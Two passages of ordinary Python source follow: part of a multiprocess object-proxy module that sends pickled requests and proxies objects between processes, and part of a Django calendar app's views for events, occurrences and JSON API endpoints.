Description of request strings and options allowed for each:
============= ============= ========================================================
request option description
------------- ------------- --------------------------------------------------------
getObjAttr Request the remote process return (proxy to) an
attribute of an object.
obj reference to object whose attribute should be
returned
attr string name of attribute to return
returnValue bool or 'auto' indicating whether to return a proxy or
the actual value.
callObj Request the remote process call a function or
method. If a request ID is given, then the call's
return value will be sent back (or information
about the error that occurred while running the
function)
obj the (reference to) object to call
args tuple of arguments to pass to callable
kwds dict of keyword arguments to pass to callable
returnValue bool or 'auto' indicating whether to return a proxy or
the actual value.
getObjValue Request the remote process return the value of
a proxied object (must be picklable)
obj reference to object whose value should be returned
transfer Copy an object to the remote process and request
it return a proxy for the new object.
obj The object to transfer.
import Request the remote process import new symbols
and return proxy(ies) to the imported objects
module the string name of the module to import
fromlist optional list of string names to import from module
del Inform the remote process that a proxy has been
released (thus the remote process may be able to
release the original object)
proxyId id of proxy which is no longer referenced by
remote host
close Instruct the remote process to stop its event loop
and exit. Optionally, this request may return a
confirmation.
result Inform the remote process that its request has
been processed
result return value of a request
error Inform the remote process that its request failed
exception the Exception that was raised (or None if the
exception could not be pickled)
excString string-formatted version of the exception and
traceback
============= =====================================================================
"""
if self.exited:
self.debugMsg(' send: exited already; raise ClosedError.')
raise ClosedError()
with self.sendLock:
#if len(kwds) > 0:
#print "Warning: send() ignored args:", kwds
if opts is None:
opts = {}
assert callSync in ['off', 'sync', 'async'], 'callSync must be one of "off", "sync", or "async" (got %r)' % callSync
if reqId is None:
if callSync != 'off': ## requested return value; use the next available request ID
reqId = self.nextRequestId
self.nextRequestId += 1
else:
## If requestId is provided, this _must_ be a response to a previously received request.
assert request in ['result', 'error']
if returnType is not None:
opts['returnType'] = returnType
#print os.getpid(), "send request:", request, reqId, opts
## double-pickle args to ensure that at least status and request ID get through
try:
optStr = pickle.dumps(opts)
except:
print("==== Error pickling this object: ====")
print(opts)
print("=======================================")
raise
nByteMsgs = 0
if byteData is not None:
nByteMsgs = len(byteData)
## Send primary request
request = (request, reqId, nByteMsgs, optStr)
self.debugMsg('send request: cmd=%s nByteMsgs=%d id=%s opts=%s', request[0], nByteMsgs, reqId, opts)
self.conn.send(request)
## follow up by sending byte messages
if byteData is not None:
for obj in byteData: ## Remote process _must_ be prepared to read the same number of byte messages!
self.conn.send_bytes(obj)
self.debugMsg(' sent %d byte messages', len(byteData))
self.debugMsg(' call sync: %s', callSync)
if callSync == 'off':
return
req = Request(self, reqId, description=str(request), timeout=timeout)
if callSync == 'async':
return req
if callSync == 'sync':
return req.result()
def close(self, callSync='off', noCleanup=False, **kwds):
try:
self.send(request='close', opts=dict(noCleanup=noCleanup), callSync=callSync, **kwds)
self.exited = True
except ClosedError:
pass
def getResult(self, reqId):
## raises NoResultError if the result is not available yet
#print self.results.keys(), os.getpid()
with self.resultLock:
haveResult = reqId in self.results
if not haveResult:
try:
self.processRequests()
except ClosedError: ## even if remote connection has closed, we may have
## received new data during this call to processRequests()
pass
with self.resultLock:
if reqId not in self.results:
raise NoResultError()
status, result = self.results.pop(reqId)
if status == 'result':
return result
elif status == 'error':
#print ''.join(result)
exc, excStr = result
if exc is not None:
print("===== Remote process raised exception on request: =====")
print(''.join(excStr))
print("===== Local Traceback to request follows: =====")
raise exc
else:
print(''.join(excStr))
raise Exception("Error getting result. See above for exception from remote process.")
else:
raise Exception("Internal error.")
def _import(self, mod, **kwds):
"""
Request the remote process import a module (or symbols from a module)
and return the proxied results. Uses built-in __import__() function, but
adds a bit more processing:
_import('module') => returns module
_import('module.submodule') => returns submodule
(note this differs from behavior of __import__)
_import('module', fromlist=[name1, name2, ...]) => returns [module.name1, module.name2, ...]
(this also differs from behavior of __import__)
"""
return self.send(request='import', callSync='sync', opts=dict(module=mod), **kwds)
def getObjAttr(self, obj, attr, **kwds):
return self.send(request='getObjAttr', opts=dict(obj=obj, attr=attr), **kwds)
def getObjValue(self, obj, **kwds):
return self.send(request='getObjValue', opts=dict(obj=obj), **kwds)
def callObj(self, obj, args, kwds, **opts):
opts = opts.copy()
args = list(args)
## Decide whether to send arguments by value or by proxy
with self.optsLock:
noProxyTypes = opts.pop('noProxyTypes', None)
if noProxyTypes is None:
noProxyTypes = self.proxyOptions['noProxyTypes']
autoProxy = opts.pop('autoProxy', self.proxyOptions['autoProxy'])
if autoProxy is True:
args = [self.autoProxy(v, noProxyTypes) for v in args]
for k, v in kwds.items():
opts[k] = self.autoProxy(v, noProxyTypes)
byteMsgs = []
## If there are arrays in the arguments, send those as byte messages.
## We do this because pickling arrays is too expensive.
for i,arg in enumerate(args):
if arg.__class__ == np.ndarray:
args[i] = ("__byte_message__", len(byteMsgs), (arg.dtype, arg.shape))
byteMsgs.append(arg)
for k,v in kwds.items():
if v.__class__ == np.ndarray:
kwds[k] = ("__byte_message__", len(byteMsgs), (v.dtype, v.shape))
byteMsgs.append(v)
return self.send(request='callObj', opts=dict(obj=obj, args=args, kwds=kwds), byteData=byteMsgs, **opts)
def registerProxy(self, proxy):
with self.proxyLock:
ref = weakref.ref(proxy, self.deleteProxy)
self.proxies[ref] = proxy._proxyId
def deleteProxy(self, ref):
if self.send is None:
# this can happen during shutdown
return
with self.proxyLock:
proxyId = self.proxies.pop(ref)
try:
self.send(request='del', opts=dict(proxyId=proxyId), callSync='off')
except ClosedError: ## if remote process has closed down, there is no need to send delete requests anymore
pass
def transfer(self, obj, **kwds):
"""
Transfer an object by value to the remote host (the object must be picklable)
and return a proxy for the new remote object.
"""
if obj.__class__ is np.ndarray:
opts = {'dtype': obj.dtype, 'shape': obj.shape}
return self.send(request='transferArray', opts=opts, byteData=[obj], **kwds)
else:
return self.send(request='transfer', opts=dict(obj=obj), **kwds)
def autoProxy(self, obj, noProxyTypes):
## Return object wrapped in LocalObjectProxy _unless_ its type is in noProxyTypes.
for typ in noProxyTypes:
if isinstance(obj, typ):
return obj
return LocalObjectProxy(obj)
class Request(object):
"""
Request objects are returned when calling an ObjectProxy in asynchronous mode
or if a synchronous call has timed out. Use hasResult() to ask whether
the result of the call has been returned yet. Use result() to get
the returned value.
"""
def __init__(self, process, reqId, description=None, timeout=10):
self.proc = process
self.description = description
self.reqId = reqId
self.gotResult = False
self._result = None
self.timeout = timeout
def result(self, block=True, timeout=None):
"""
Return the result for this request.
If block is True, wait until the result has arrived or *timeout* seconds passes.
If the timeout is reached, raise NoResultError. (use timeout=None to disable)
If block is False, raise NoResultError immediately if the result has not arrived yet.
If the process's connection has closed before the result arrives, raise ClosedError.
"""
if self.gotResult:
return self._result
if timeout is None:
timeout = self.timeout
if block:
start = time.time()
while not self.hasResult():
if self.proc.exited:
raise ClosedError()
time.sleep(0.005)
if timeout >= 0 and time.time() - start > timeout:
print("Request timed out: %s" % self.description)
import traceback
traceback.print_stack()
raise NoResultError()
return self._result
else:
self._result = self.proc.getResult(self.reqId) ## raises NoResultError if result is not available yet
self.gotResult = True
return self._result
def hasResult(self):
"""Returns True if the result for this request has arrived."""
try:
self.result(block=False)
except NoResultError:
pass
return self.gotResult
class LocalObjectProxy(object):
"""
Used for wrapping local objects to ensure that they are send by proxy to a remote host.
Note that 'proxy' is just a shorter alias for LocalObjectProxy.
For example::
data = [1,2,3,4,5]
remotePlot.plot(data) ## by default, lists are pickled and sent by value
remotePlot.plot(proxy(data)) ## force the object to be sent by proxy
"""
nextProxyId = 0
proxiedObjects = {} ## maps {proxyId: object}
@classmethod
def registerObject(cls, obj):
## assign it a unique ID so we can keep a reference to the local object
pid = cls.nextProxyId
cls.nextProxyId += 1
cls.proxiedObjects[pid] = obj
#print "register:", cls.proxiedObjects
return pid
@classmethod
def lookupProxyId(cls, pid):
return cls.proxiedObjects[pid]
@classmethod
def releaseProxyId(cls, pid):
del cls.proxiedObjects[pid]
#print "release:", cls.proxiedObjects
def __init__(self, obj, **opts):
"""
Create a 'local' proxy object that, when sent to a remote host,
will appear as a normal ObjectProxy to *obj*.
Any extra keyword arguments are passed to proxy._setProxyOptions()
on the remote side.
"""
self.processId = os.getpid()
#self.objectId = id(obj)
self.typeStr = repr(obj)
#self.handler = handler
self.obj = obj
self.opts = opts
def __reduce__(self):
## a proxy is being pickled and sent to a remote process.
## every time this happens, a new proxy will be generated in the remote process,
## so we keep a new ID so we can track when each is released.
pid = LocalObjectProxy.registerObject(self.obj)
return (unpickleObjectProxy, (self.processId, pid, self.typeStr, None, self.opts))
## alias
proxy = LocalObjectProxy
def unpickleObjectProxy(processId, proxyId, typeStr, attributes=None, opts=None):
if processId == os.getpid():
obj = LocalObjectProxy.lookupProxyId(proxyId)
if attributes is not None:
for attr in attributes:
obj = getattr(obj, attr)
return obj
else:
proxy = ObjectProxy(processId, proxyId=proxyId, typeStr=typeStr)
if opts is not None:
proxy._setProxyOptions(**opts)
return proxy
class ObjectProxy(object):
"""
Proxy to an object stored by the remote process. Proxies are created
by calling Process._import(), Process.transfer(), or by requesting/calling
attributes on existing proxy objects.
For the most part, this object can be used exactly as if it
were a local object::
rsys = proc._import('sys') # returns proxy to sys module on remote process
rsys.stdout # proxy to remote sys.stdout
rsys.stdout.write # proxy to remote sys.stdout.write
rsys.stdout.write('hello') # calls sys.stdout.write('hello') on remote machine
# and returns the result (None)
When calling a proxy to a remote function, the call can be made synchronous
(result of call is returned immediately), asynchronous (result is returned later),
or return can be disabled entirely::
ros = proc._import('os')
## synchronous call; result is returned immediately
pid = ros.getpid()
## asynchronous call
request = ros.getpid(_callSync='async')
while not request.hasResult():
time.sleep(0.01)
pid = request.result()
## disable return when we know it isn't needed
rsys.stdout.write('hello', _callSync='off')
Additionally, values returned from a remote function call are automatically
returned either by value (must be picklable) or by proxy.
This behavior can be forced::
rnp = proc._import('numpy')
arrProxy = rnp.array([1,2,3,4], _returnType='proxy')
arrValue = rnp.array([1,2,3,4], _returnType='value')
The default callSync and returnType behaviors (as well as others) can be set
for each proxy individually using ObjectProxy._setProxyOptions() or globally using
proc.setProxyOptions().
"""
def __init__(self, processId, proxyId, typeStr='', parent=None):
object.__init__(self)
## can't set attributes directly because setattr is overridden.
self.__dict__['_processId'] = processId
self.__dict__['_typeStr'] = typeStr
self.__dict__['_proxyId'] = proxyId
self.__dict__['_attributes'] = ()
## attributes that affect the behavior of the proxy.
## in all cases, a value of None causes the proxy to ask
## its parent event handler to make the decision
self.__dict__['_proxyOptions'] = {
'callSync': None, ## 'sync', 'async', None
'timeout': None, ## float, None
'returnType': None, ## 'proxy', 'value', 'auto', None
'deferGetattr': None, ## True, False, None
'noProxyTypes': None, ## list of types to send by value instead of by proxy
'autoProxy': None,
}
self.__dict__['_handler'] = RemoteEventHandler.getHandler(processId)
self.__dict__['_handler'].registerProxy(self) ## handler will watch proxy; inform remote process when the proxy is deleted.
def _setProxyOptions(self, **kwds):
"""
Change the behavior of this proxy. For all options, a value of None
will cause the proxy to instead use the default behavior defined
by its parent Process.
Options are:
============= =============================================================
callSync 'sync', 'async', 'off', or None.
If 'async', then calling methods will return a Request object
which can be used to inquire later about the result of the
method call.
If 'sync', then calling a method
will block until the remote process has returned its result
or the timeout has elapsed (in this case, a Request object
is returned instead).
If 'off', then the remote process is instructed _not_ to
reply and the method call will return None immediately.
returnType 'auto', 'proxy', 'value', or None.
If 'proxy', then the value returned when calling a method
will be a proxy to the object on the remote process.
If 'value', then attempt to pickle the returned object and
send it back.
If 'auto', then the decision is made by consulting the
'noProxyTypes' option.
autoProxy bool or None. If True, arguments to __call__ are
automatically converted to proxy unless their type is
listed in noProxyTypes (see below). If False, arguments
are left untouched. Use proxy(obj) to manually convert
arguments before sending.
timeout float or None. Length of time to wait during synchronous
requests before returning a Request object instead.
deferGetattr True, False, or None.
If False, all attribute requests will be sent to the remote
process immediately and will block until a response is
received (or timeout has elapsed).
If True, requesting an attribute from the proxy returns a
new proxy immediately. The remote process is _not_ contacted
to make this request. This is faster, but it is possible to
request an attribute that does not exist on the proxied
object. In this case, AttributeError will not be raised
until an attempt is made to look up the attribute on the
remote process.
noProxyTypes List of object types that should _not_ be proxied when
sent to the remote process.
============= =============================================================
"""
for k in kwds:
if k not in self._proxyOptions:
raise KeyError("Unrecognized proxy option '%s'" % k)
self._proxyOptions.update(kwds)
def _getValue(self):
"""
Return the value of the proxied object
(the remote object must be picklable)
"""
return self._handler.getObjValue(self)
def _getProxyOption(self, opt):
val = self._proxyOptions[opt]
if val is None:
return self._handler.getProxyOption(opt)
return val
def _getProxyOptions(self):
return dict([(k, self._getProxyOption(k)) for k in self._proxyOptions])
def __reduce__(self):
return (unpickleObjectProxy, (self._processId, self._proxyId, self._typeStr, self._attributes))
def __repr__(self):
#objRepr = self.__getattr__('__repr__')(callSync='value')
return "<ObjectProxy for process %d, object 0x%x: %s >" % (self._processId, self._proxyId, self._typeStr)
def __getattr__(self, attr, **kwds):
"""
Calls __getattr__ on the remote object and returns the attribute
by value or by proxy depending on the options set (see
ObjectProxy._setProxyOptions and RemoteEventHandler.setProxyOptions)
If the option 'deferGetattr' is True for this proxy, then a new proxy object
is returned _without_ asking the remote object whether the named attribute exists.
This can save time when making multiple chained attribute requests,
but may also defer a possible AttributeError until later, making
them more difficult to debug.
"""
opts = self._getProxyOptions()
for k in opts:
if '_'+k in kwds:
opts[k] = kwds.pop('_'+k)
if opts['deferGetattr'] is True:
return self._deferredAttr(attr)
else:
#opts = self._getProxyOptions()
return self._handler.getObjAttr(self, attr, **opts)
def _deferredAttr(self, attr):
return DeferredObjectProxy(self, attr)
def __call__(self, *args, **kwds):
"""
Attempts to call the proxied object from the remote process.
Accepts extra keyword arguments:
_callSync 'off', 'sync', or 'async'
_returnType 'value', 'proxy', or 'auto'
If the remote call raises an exception on the remote process,
it will be re-raised on the local process.
"""
opts = self._getProxyOptions()
for k in opts:
if '_'+k in kwds:
opts[k] = kwds.pop('_'+k)
return self._handler.callObj(obj=self, args=args, kwds=kwds, **opts)
## Explicitly proxy special methods. Is there a better way to do this??
def _getSpecialAttr(self, attr):
## this just gives us an easy way to change the behavior of the special methods
return self._deferredAttr(attr)
def __getitem__(self, *args):
return self._getSpecialAttr('__getitem__')(*args)
def __setitem__(self, *args):
return self._getSpecialAttr('__setitem__')(*args, _callSync='off')
def __setattr__(self, *args):
return self._getSpecialAttr('__setattr__')(*args, _callSync='off')
def __str__(self, *args):
return self._getSpecialAttr('__str__')(*args, _returnType='value')
def __len__(self, *args):
return self._getSpecialAttr('__len__')(*args)
def __add__(self, *args):
return self._getSpecialAttr('__add__')(*args)
def __sub__(self, *args):
return self._getSpecialAttr('__sub__')(*args)
def __div__(self, *args):
return self._getSpecialAttr('__div__')(*args)
def __truediv__(self, *args):
return self._getSpecialAttr('__truediv__')(*args)
def __floordiv__(self, *args):
return self._getSpecialAttr('__floordiv__')(*args)
def __mul__(self, *args):
return self._getSpecialAttr('__mul__')(*args)
def __pow__(self, *args):
return self._getSpecialAttr('__pow__')(*args)
def __iadd__(self, *args):
return self._getSpecialAttr('__iadd__')(*args, _callSync='off')
def __isub__(self, *args):
return self._getSpecialAttr('__isub__')(*args, _callSync='off')
def __idiv__(self, *args):
return self._getSpecialAttr('__idiv__')(*args, _callSync='off')
def __itruediv__(self, *args):
return self._getSpecialAttr('__itruediv__')(*args, _callSync='off')
def __ifloordiv__(self, *args):
return self._getSpecialAttr('__ifloordiv__')(*args, _callSync='off')
def __imul__(self, *args):
return self._getSpecialAttr('__imul__')(*args, _callSync='off')
def __ipow__(self, *args):
return self._getSpecialAttr('__ipow__')(*args, _callSync='off')
def __rshift__(self, *args):
return self._getSpecialAttr('__rshift__')(*args)
def __lshift__(self, *args):
return self._getSpecialAttr('__lshift__')(*args)
def __irshift__(self, *args):
return self._getSpecialAttr('__irshift__')(*args, _callSync='off')
def __ilshift__(self, *args):
return self._getSpecialAttr('__ilshift__')(*args, _callSync='off')
def __eq__(self, *args):
return self._getSpecialAttr('__eq__')(*args)
def __ne__(self, *args):
return self._getSpecialAttr('__ne__')(*args)
def __lt__(self, *args):
return self._getSpecialAttr('__lt__')(*args)
def __gt__(self, *args):
return self._getSpecialAttr('__gt__')(*args)
def __le__(self, *args):
return self._getSpecialAttr('__le__')(*args)
def __ge__(self, *args):
return self._getSpecialAttr('__ge__')(*args)
def __and__(self, *args):
return self._getSpecialAttr('__and__')(*args)
def __or__(self, *args):
return self._getSpecialAttr('__or__')(*args)
def __xor__(self, *args):
return self._getSpecialAttr('__xor__')(*args)
def __iand__(self, *args):
return self._getSpecialAttr('__iand__')(*args, _callSync='off')
def __ior__(self, *args):
return self._getSpecialAttr('__ior__')(*args, _callSync='off')
def __ixor__(self, *args):
return self._getSpecialAttr('__ixor__')(*args, _callSync='off')
def __mod__(self, *args):
return self._getSpecialAttr('__mod__')(*args)
def __radd__(self, *args):
return self._getSpecialAttr('__radd__')(*args)
def __rsub__(self, *args):
return self._getSpecialAttr('__rsub__')(*args)
def __rdiv__(self, *args):
return self._getSpecialAttr('__rdiv__')(*args)
def __rfloordiv__(self, *args):
return self._getSpecialAttr('__rfloordiv__')(*args)
def __rtruediv__(self, *args):
return self._getSpecialAttr('__rtruediv__')(*args)
def __rmul__(self, *args):
return self._getSpecialAttr('__rmul__')(*args)
def __rpow__(self, *args):
return self._getSpecialAttr('__rpow__')(*args)
def __rrshift__(self, *args):
return self._getSpecialAttr('__rrshift__')(*args)
def __rlshift__(self, *args):
return self._getSpecialAttr('__rlshift__')(*args)
def __rand__(self, *args):
return self._getSpecialAttr('__rand__')(*args)
def __ror__(self, *args):
return self._getSpecialAttr('__ror__')(*args)
def __rxor__(self, *args):
return self._getSpecialAttr('__ror__')(*args)
def __rmod__(self, *args):
return self._getSpecialAttr('__rmod__')(*args)
def __hash__(self):
## Required for python3 since __eq__ is defined.
return id(self)
class DeferredObjectProxy(ObjectProxy):
"""
This class represents an attribute (or sub-attribute) of a proxied object.
It is used to speed up attribute requests. Take the following scenario::
rsys = proc._import('sys')
rsys.stdout.write('hello')
For this simple example, a total of 4 synchronous requests are made to
the remote process:
1) import sys
2) getattr(sys, 'stdout')
3) getattr(stdout, 'write')
4) write('hello')
This takes a lot longer than running the equivalent code locally. To
speed things up, we can 'defer' the two attribute lookups so they are
only carried out when neccessary::
rsys = proc._import('sys')
rsys._setProxyOptions(deferGetattr=True)
rsys.stdout.write('hello')
This example only makes two requests to the remote process; the two
attribute lookups immediately return DeferredObjectProxy instances
immediately without contacting the remote process. When the call
to write() is made, all attribute requests are processed at the same time.
Note that if the attributes requested do not exist on the remote object,
making the call to write() will raise an AttributeError.
"""
def __init__(self, parentProxy, attribute):
## can't set attributes directly because setattr is overridden.
for k in ['_processId', '_typeStr', '_proxyId', '_handler']:
self.__dict__[k] = getattr(parentProxy, k)
self.__dict__['_parent'] = parentProxy ## make sure parent stays alive
self.__dict__['_attributes'] = parentProxy._attributes + (attribute,)
self.__dict__['_proxyOptions'] = parentProxy._proxyOptions.copy()
def __repr__(self):
return ObjectProxy.__repr__(self) + '.' + '.'.join(self._attributes)
def _undefer(self):
"""
Return a non-deferred ObjectProxy referencing the same object
"""
return self._parent.__getattr__(self._attributes[-1], _deferGetattr=False)
|
|
import datetime
import dateutil.parser
import pytz
from django.conf import settings
from django.core.urlresolvers import reverse
from django.db.models import F, Q
from django.http import (
Http404, HttpResponseBadRequest, HttpResponseRedirect, JsonResponse,
)
from django.shortcuts import get_object_or_404
from django.utils import timezone
from django.utils.http import is_safe_url
from django.utils.six.moves.urllib.parse import quote
from django.views.decorators.http import require_POST
from django.views.generic.base import TemplateResponseMixin
from django.views.generic.detail import DetailView
from django.views.generic.edit import (
CreateView, DeleteView, ModelFormMixin, ProcessFormView, UpdateView,
)
from schedule.forms import EventForm, OccurrenceForm
from schedule.models import Calendar, Event, Occurrence
from schedule.periods import weekday_names
from schedule.settings import (
CHECK_EVENT_PERM_FUNC, CHECK_OCCURRENCE_PERM_FUNC, EVENT_NAME_PLACEHOLDER,
GET_EVENTS_FUNC, OCCURRENCE_CANCEL_REDIRECT, USE_FULLCALENDAR,
)
from schedule.utils import (
check_calendar_permissions, check_event_permissions,
check_occurrence_permissions, coerce_date_dict,
)
class CalendarViewPermissionMixin(object):
@classmethod
def as_view(cls, **initkwargs):
view = super(CalendarViewPermissionMixin, cls).as_view(**initkwargs)
return check_calendar_permissions(view)
class EventEditPermissionMixin(object):
@classmethod
def as_view(cls, **initkwargs):
view = super(EventEditPermissionMixin, cls).as_view(**initkwargs)
return check_event_permissions(view)
class OccurrenceEditPermissionMixin(object):
@classmethod
def as_view(cls, **initkwargs):
view = super(OccurrenceEditPermissionMixin, cls).as_view(**initkwargs)
return check_occurrence_permissions(view)
class CancelButtonMixin(object):
def post(self, request, *args, **kwargs):
next_url = kwargs.get('next')
self.success_url = get_next_url(request, next_url)
if "cancel" in request.POST:
return HttpResponseRedirect(self.success_url)
else:
return super(CancelButtonMixin, self).post(request, *args, **kwargs)
class CalendarMixin(CalendarViewPermissionMixin):
model = Calendar
slug_url_kwarg = 'calendar_slug'
class CalendarView(CalendarMixin, DetailView):
template_name = 'schedule/calendar.html'
class FullCalendarView(CalendarMixin, DetailView):
template_name = "fullcalendar.html"
def get_context_data(self, **kwargs):
context = super(FullCalendarView, self).get_context_data()
context['calendar_slug'] = self.kwargs.get('calendar_slug')
return context
class CalendarByPeriodsView(CalendarMixin, DetailView):
template_name = 'schedule/calendar_by_period.html'
def get_context_data(self, **kwargs):
context = super(CalendarByPeriodsView, self).get_context_data(**kwargs)
calendar = self.object
period_class = self.kwargs['period']
try:
date = coerce_date_dict(self.request.GET)
except ValueError:
raise Http404
if date:
try:
date = datetime.datetime(**date)
except ValueError:
raise Http404
else:
date = timezone.now()
event_list = GET_EVENTS_FUNC(self.request, calendar)
local_timezone = timezone.get_current_timezone()
period = period_class(event_list, date, tzinfo=local_timezone)
context.update({
'date': date,
'period': period,
'calendar': calendar,
'weekday_names': weekday_names,
'here': quote(self.request.get_full_path()),
})
return context
class OccurrenceMixin(CalendarViewPermissionMixin, TemplateResponseMixin):
model = Occurrence
pk_url_kwarg = 'occurrence_id'
form_class = OccurrenceForm
class OccurrenceEditMixin(CancelButtonMixin, OccurrenceEditPermissionMixin, OccurrenceMixin):
def get_initial(self):
initial_data = super(OccurrenceEditMixin, self).get_initial()
_, self.object = get_occurrence(**self.kwargs)
return initial_data
class OccurrenceView(OccurrenceMixin, DetailView):
template_name = 'schedule/occurrence.html'
class OccurrencePreview(OccurrenceMixin, ModelFormMixin, ProcessFormView):
template_name = 'schedule/occurrence.html'
def get_context_data(self, **kwargs):
context = super(OccurrencePreview, self).get_context_data()
context = {
'event': self.object.event,
'occurrence': self.object,
}
return context
class EditOccurrenceView(OccurrenceEditMixin, UpdateView):
template_name = 'schedule/edit_occurrence.html'
class CreateOccurrenceView(OccurrenceEditMixin, CreateView):
template_name = 'schedule/edit_occurrence.html'
class CancelOccurrenceView(OccurrenceEditMixin, ModelFormMixin, ProcessFormView):
template_name = 'schedule/cancel_occurrence.html'
def post(self, request, *args, **kwargs):
event, occurrence = get_occurrence(**kwargs)
self.success_url = kwargs.get(
'next',
get_next_url(request, event.get_absolute_url()))
if 'cancel' not in request.POST:
occurrence.cancel()
return HttpResponseRedirect(self.success_url)
class EventMixin(CalendarViewPermissionMixin):
model = Event
pk_url_kwarg = 'event_id'
class EventEditMixin(CancelButtonMixin, EventEditPermissionMixin, EventMixin):
pass
class EventView(EventMixin, DetailView):
template_name = 'schedule/event.html'
class EditEventView(EventEditMixin, UpdateView):
form_class = EventForm
template_name = 'schedule/create_event.html'
def form_valid(self, form):
event = form.save(commit=False)
old_event = Event.objects.get(pk=event.pk)
dts = datetime.timedelta(
minutes=int((event.start - old_event.start).total_seconds() / 60)
)
dte = datetime.timedelta(
minutes=int((event.end - old_event.end).total_seconds() / 60)
)
event.occurrence_set.all().update(
original_start=F('original_start') + dts,
original_end=F('original_end') + dte,
)
event.save()
return super(EditEventView, self).form_valid(form)
class CreateEventView(EventEditMixin, CreateView):
form_class = EventForm
template_name = 'schedule/create_event.html'
def get_initial(self):
date = coerce_date_dict(self.request.GET)
initial_data = None
if date:
try:
start = datetime.datetime(**date)
initial_data = {
'start': start,
'end': start + datetime.timedelta(minutes=30)
}
except TypeError:
raise Http404
except ValueError:
raise Http404
return initial_data
def form_valid(self, form):
event = form.save(commit=False)
event.creator = self.request.user
event.calendar = get_object_or_404(Calendar, slug=self.kwargs['calendar_slug'])
event.save()
return HttpResponseRedirect(event.get_absolute_url())
class DeleteEventView(EventEditMixin, DeleteView):
template_name = 'schedule/delete_event.html'
def get_context_data(self, **kwargs):
ctx = super(DeleteEventView, self).get_context_data(**kwargs)
ctx['next'] = self.get_success_url()
return ctx
def get_success_url(self):
"""
After the event is deleted there are three options for redirect, tried in
this order:
# Try to find a 'next' GET variable
# If the key word argument redirect is set
# Lastly redirect to the event detail of the recently create event
"""
url_val = 'fullcalendar' if USE_FULLCALENDAR else 'day_calendar'
next_url = self.kwargs.get('next') or reverse(url_val, args=[self.object.calendar.slug])
next_url = get_next_url(self.request, next_url)
return next_url
def get_occurrence(event_id, occurrence_id=None, year=None, month=None,
day=None, hour=None, minute=None, second=None,
tzinfo=None):
"""
Because occurrences don't have to be persisted, there must be two ways to
retrieve them. both need an event, but if its persisted the occurrence can
be retrieved with an id. If it is not persisted it takes a date to
retrieve it. This function returns an event and occurrence regardless of
which method is used.
"""
if(occurrence_id):
occurrence = get_object_or_404(Occurrence, id=occurrence_id)
event = occurrence.event
elif None not in (year, month, day, hour, minute, second):
event = get_object_or_404(Event, id=event_id)
date = timezone.make_aware(datetime.datetime(int(year), int(month),
int(day), int(hour), int(minute),
int(second)), tzinfo)
occurrence = event.get_occurrence(date)
if occurrence is None:
raise Http404
else:
raise Http404
return event, occurrence
def check_next_url(next_url):
"""
Checks to make sure the next url is not redirecting to another page.
Basically it is a minimal security check.
"""
if not next_url or '://' in next_url:
return None
return next_url
def get_next_url(request, default):
next_url = default
if OCCURRENCE_CANCEL_REDIRECT:
next_url = OCCURRENCE_CANCEL_REDIRECT
_next_url = request.GET.get('next') if request.method in ['GET', 'HEAD'] else request.POST.get('next')
if _next_url and is_safe_url(url=_next_url, host=request.get_host()):
next_url = _next_url
return next_url
@check_calendar_permissions
def api_occurrences(request):
start = request.GET.get('start')
end = request.GET.get('end')
calendar_slug = request.GET.get('calendar_slug')
timezone = request.GET.get('timezone')
try:
response_data = _api_occurrences(start, end, calendar_slug, timezone)
except (ValueError, Calendar.DoesNotExist) as e:
return HttpResponseBadRequest(e)
return JsonResponse(response_data, safe=False)
def _api_occurrences(start, end, calendar_slug, timezone):
if not start or not end:
raise ValueError('Start and end parameters are required')
# version 2 of full calendar
# TODO: improve this code with date util package
if '-' in start:
def convert(ddatetime):
if ddatetime:
ddatetime = ddatetime.split(' ')[0]
return datetime.datetime.strptime(ddatetime, '%Y-%m-%d')
else:
def convert(ddatetime):
return datetime.datetime.utcfromtimestamp(float(ddatetime))
start = convert(start)
end = convert(end)
current_tz = False
if timezone and timezone in pytz.common_timezones:
# make start and end dates aware in given timezone
current_tz = pytz.timezone(timezone)
start = current_tz.localize(start)
end = current_tz.localize(end)
elif settings.USE_TZ:
# If USE_TZ is True, make start and end dates aware in UTC timezone
utc = pytz.UTC
start = utc.localize(start)
end = utc.localize(end)
if calendar_slug:
# will raise DoesNotExist exception if no match
calendars = [Calendar.objects.get(slug=calendar_slug)]
# if no calendar slug is given, get all the calendars
else:
calendars = Calendar.objects.all()
response_data = []
# Algorithm to get an id for the occurrences in fullcalendar (NOT THE SAME
# AS IN THE DB) which are always unique.
# Fullcalendar thinks that all their "events" with the same "event.id" in
# their system are the same object, because it's not really built around
# the idea of events (generators)
# and occurrences (their events).
# Check the "persisted" boolean value that tells it whether to change the
# event, using the "event_id" or the occurrence with the specified "id".
# for more info https://github.com/llazzaro/django-scheduler/pull/169
i = 1
if Occurrence.objects.all().count() > 0:
i = Occurrence.objects.latest('id').id + 1
event_list = []
for calendar in calendars:
# create flat list of events from each calendar
event_list += calendar.events.filter(start__lte=end).filter(
Q(end_recurring_period__gte=start) |
Q(end_recurring_period__isnull=True))
for event in event_list:
occurrences = event.get_occurrences(start, end)
for occurrence in occurrences:
occurrence_id = i + occurrence.event.id
existed = False
if occurrence.id:
occurrence_id = occurrence.id
existed = True
recur_rule = occurrence.event.rule.name \
if occurrence.event.rule else None
if occurrence.event.end_recurring_period:
recur_period_end = occurrence.event.end_recurring_period
if current_tz:
# make recur_period_end aware in given timezone
recur_period_end = recur_period_end.astimezone(current_tz)
recur_period_end = recur_period_end
else:
recur_period_end = None
event_start = occurrence.start
event_end = occurrence.end
if current_tz:
# make event start and end dates aware in given timezone
event_start = event_start.astimezone(current_tz)
event_end = event_end.astimezone(current_tz)
response_data.append({
'id': occurrence_id,
'title': occurrence.title,
'start': event_start,
'end': event_end,
'existed': existed,
'event_id': occurrence.event.id,
'color': occurrence.event.color_event,
'description': occurrence.description,
'rule': recur_rule,
'end_recurring_period': recur_period_end,
'creator': str(occurrence.event.creator),
'calendar': occurrence.event.calendar.slug,
'cancelled': occurrence.cancelled,
})
return response_data
@require_POST
@check_calendar_permissions
def api_move_or_resize_by_code(request):
response_data = {}
user = request.user
id = request.POST.get('id')
existed = bool(request.POST.get('existed') == 'true')
delta = datetime.timedelta(minutes=int(request.POST.get('delta')))
resize = bool(request.POST.get('resize', False))
event_id = request.POST.get('event_id')
response_data = _api_move_or_resize_by_code(
user,
id,
existed,
delta,
resize,
event_id)
return JsonResponse(response_data)
def _api_move_or_resize_by_code(user, id, existed, delta, resize, event_id):
response_data = {}
response_data['status'] = "PERMISSION DENIED"
if existed:
occurrence = Occurrence.objects.get(id=id)
occurrence.end += delta
if not resize:
occurrence.start += delta
if CHECK_OCCURRENCE_PERM_FUNC(occurrence, user):
occurrence.save()
